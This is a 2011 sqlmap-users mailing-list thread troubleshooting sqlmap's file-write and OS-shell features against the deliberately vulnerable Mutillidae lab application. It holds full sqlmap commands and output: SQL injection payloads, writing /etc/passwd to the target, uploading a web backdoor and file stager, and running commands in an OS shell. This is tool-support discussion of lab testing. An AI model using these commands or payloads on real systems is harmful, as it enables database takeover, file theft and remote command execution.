Hi Chris, No worries. If you want command execution, sqlmap can handle it automatically also when it's MySQL and you've got a writable folder within the document root, --os-cmd and --os-shell. Also, --os-pwn can work in this scenario too. The file stager uploaded is 0KB because you provide invalid values to the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to upload the file stager against MySQL.
See: --8<-- $ python sqlmap.py -u "http://debian32/mutillidae/index.php?page=user-info.php"; --data "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 --os-shell --flush-session sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:49:52 [23:49:52] [INFO] setting file for logging HTTP traffic [23:49:52] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' as session file [23:49:52] [INFO] flushing session file [23:49:52] [INFO] testing connection to the target url [23:49:52] [INFO] heuristics detected web page charset 'ascii' [23:49:52] [INFO] testing if the url is stable, wait a few seconds [23:49:53] [INFO] url is stable [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not dynamic [23:49:53] [INFO] heuristic test shows that POST parameter 'view_user_name' might be injectable (possible DBMS: MySQL) [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 AND time-based blind' injectable [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable POST parameter 'view_user_name' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests: --- Place: POST Parameter: view_user_name Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ekpw'='ekpw&password=adminpass&Submit_button=Submit Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND 'TOwv'='TOwv&password=adminpass&Submit_button=Submit Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: view_user_name=admin' AND SLEEP(5) AND 'BfoH'='BfoH&password=adminpass&Submit_button=Submit --- [23:51:31] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL 5.0 [23:51:31] [INFO] going to use a web backdoor for command prompt [23:51:31] [INFO] fingerprinting the back-end DBMS operating system [23:51:31] [INFO] the back-end DBMS operating system is Linux [23:51:31] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > [23:51:32] [WARNING] unable to retrieve the web server document root please provide the web server document root [/var/www/]: [23:51:32] [WARNING] unable to retrieve any web server path please provide any additional web server full path to try to upload the agent [Enter for None]: /var/www/test [23:51:35] [WARNING] unable to upload the file stager on '/var/www' [23:51:35] [INFO] the file stager has been successfully uploaded on '/var/www/test' - http://debian32:80/test/tmpugbmo.php [23:51:35] [INFO] the backdoor has probably been successfully uploaded on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> id do you want to retrieve the command standard output? [Y/n/a] command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)' os-shell> pwd do you want to retrieve the command standard output? [Y/n/a] command standard output: '/var/www/test' os-shell> exit [23:51:44] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 1 times [23:51:44] [INFO] Fetched data logged to text files under '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' [*] shutting down at 23:51:44 --8<-- Cheers, Bernardo On 6 July 2011 23:46, <christopher.oak...@gmail.com> wrote: > Hi > > Thanks. It turns out I was being an idiot. With absolute paths I didn't > realise that this also includes the destination file name. With that > included, it works like a dream. > > What I haven't managed to get going properly yet is the --os-cmd flag. The > temp stager file does appear, but is empty, 0KB. However; I think I'll save > that one for another day! > > Regards > > Chris > ------------------ > > -----Original Message----- > From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com> > Date: Wed, 6 Jul 2011 23:42:22 > To: Chris Oakley<christopher.oak...@gmail.com> > Cc: <sqlmap-users@lists.sourceforge.net> > Subject: Re: [sqlmap-users] File Writing > > Hi Chris, > > To me it works well: > --8<-- > $ python sqlmap.py -u > "http://debian32/mutillidae/index.php?page=user-info.php"; --forms -p > view_user_name --risk 3 --level 3 --parse-errors --file-write > /etc/passwd --file-dest /tmp/test --flush-session > > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [!] legal disclaimer: usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility > to obey all applicable local, state and federal laws. Authors assume > no liability and are not responsible for any misuse or damage caused > by this program > > [*] starting at 23:26:35 > > [23:26:35] [INFO] setting file for logging HTTP traffic > [23:26:35] [INFO] testing connection to the target url > [23:26:35] [INFO] heuristics detected web page charset 'ascii' > [23:26:35] [INFO] searching for forms > [#1] form: > POST http://debian32:80/mutillidae/index.php?page=user-info.php > POST data: view_user_name=&password=&Submit_button=Submit > do you want to test this form? [Y/n/q] >> > Edit POST data [default: > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields > detected): > do you want to fill blank fields with random values? [Y/n] > [23:26:37] [WARNING] the testable parameter 'view_user_name' you > provided is not inside the GET > [23:26:37] [INFO] using > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' > as session file > [23:26:37] [INFO] flushing session file > [23:26:37] [INFO] using > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > as results file > [23:26:37] [INFO] heuristics detected web page charset 'ascii' > [23:26:37] [INFO] testing if the url is stable, wait a few seconds > [23:26:38] [INFO] url is stable > [23:26:38] [INFO] heuristic test shows that POST parameter > 'view_user_name' might be injectable (possible DBMS: MySQL) > [23:26:38] [INFO] testing sql injection on POST parameter 'view_user_name' > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING > clause (Generic comment)' > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based > blind - WHERE or HAVING clause (Generic comment)' injectable > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or > HAVING clause' > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or > HAVING clause' > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING > clause' > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING > clause' > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR > error-based - WHERE or HAVING clause' injectable > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' > [23:26:43] [INFO] target url appears to be UNION injectable with 4 columns > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION > query (NULL) - 1 to 10 columns' injectable > [23:26:43] [WARNING] in OR boolean-based injections, please consider > usage of switch --drop-set-cookie if you experience any problems > during data retrieval > POST parameter 'view_user_name' is vulnerable. Do you want to keep > testing the others? [y/N] > sqlmap identified the following injection points with a total of 148 > HTTP(s) requests: > --- > Place: POST > Parameter: view_user_name > Type: boolean-based blind > Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) > Payload: view_user_name=-5244' OR NOT (1884=1884)-- > &password=bDXj&Submit_button=Submit > > Type: error-based > Title: MySQL OR error-based - WHERE or HAVING clause > Payload: view_user_name=-3024' OR 1 GROUP BY > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- > &password=bDXj&Submit_button=Submit > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, > NULL#&password=bDXj&Submit_button=Submit > --- > > do you want to exploit this SQL injection? [Y/n] > [23:26:46] [INFO] testing MySQL > [23:26:46] [INFO] confirming MySQL > [23:26:46] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.2.6, Apache 2.2.9 > back-end DBMS: MySQL >= 5.0.0 > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system > [23:26:46] [INFO] the back-end DBMS operating system is Linux > [23:26:46] [WARNING] if the problem persists with 'None' values please > try to use hidden switch --no-cast (fixing problems with some > collation issues) > do you want confirmation that the file '/tmp/test' has been > successfully written on the back-end DBMS file system? [Y/n] > [23:26:48] [INFO] the file has been successfully written and its size > is 1848 bytes, but the size differs from the local file '/etc/passwd' > (1845 bytes) > [23:26:48] [WARNING] expect junk characters inside the file as a > leftover from UNION query > [23:26:48] [INFO] you can find results of scanning in multiple targets > mode inside the CSV file > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' > > [*] shutting down at 23:26:48 > --8<-- > > Cheers, > Bernardo > > > On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote: >> Hi >> >> I'm playing with file writing. I have a full privs root user set up in >> mysql and am using >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 >> to play with. I've set up a /temp folder below the web root of the app. >> I've put a file "evil.php" in the sqlmap working directory. I've also >> changed the permissions for all users on the temp folder to write access >> allowed. >> >> I'm using the following input to try and upload this file: >> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u >> "http://localhost/mutillidae/ind >> ex.php?page=user-info.php" --data >> "username=&password=&user-info-php-submit-butt >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"; >> --file-wr >> ite "evil.php" --file-dest "temp/evil.php" >> >> This is with the latest dev build by the way. >> >> The output I get is: >> >> [18:00:03] [INFO] the back-end DBMS is MySQL >> web server operating system: Windows >> web application technology: PHP 5.3.5, Apache 2.2.17 >> back-end DBMS: MySQL 5.0 >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system >> [18:00:03] [INFO] the back-end DBMS operating system is Windows >> [18:00:04] [WARNING] if the problem persists with 'None' values please try >> to us >> e hidden switch --no-cast (fixing problems with some collation issues) >> do you want confirmation that the file 'temp/evil.php' has been successfully >> wri >> tten on the back-end DBMS file system? [Y/n] >> [18:00:12] [WARNING] it looks like the file has not been written, this can >> occur >> if the DBMS process' user has no write privileges in the destination path >> [18:00:12] [WARNING] expect junk characters inside the file as a leftover >> from U >> NION query >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program >> Files\sqlm >> ap-0.9\output\localhost' >> >> [*] shutting down at 18:00:12 >> >> and sure enough the file isn't written. I've also tried using the --no-cast >> switch, to no avail. >> >> Does anyone have any ideas on what could be going wrong here? I can use the >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and >> --os-pwn commands also fail at the stager upload phase, probably for similar >> reasons. >> >> Any help would be appreciated >> >> Cheers >> >> Chris >> >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >>_______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
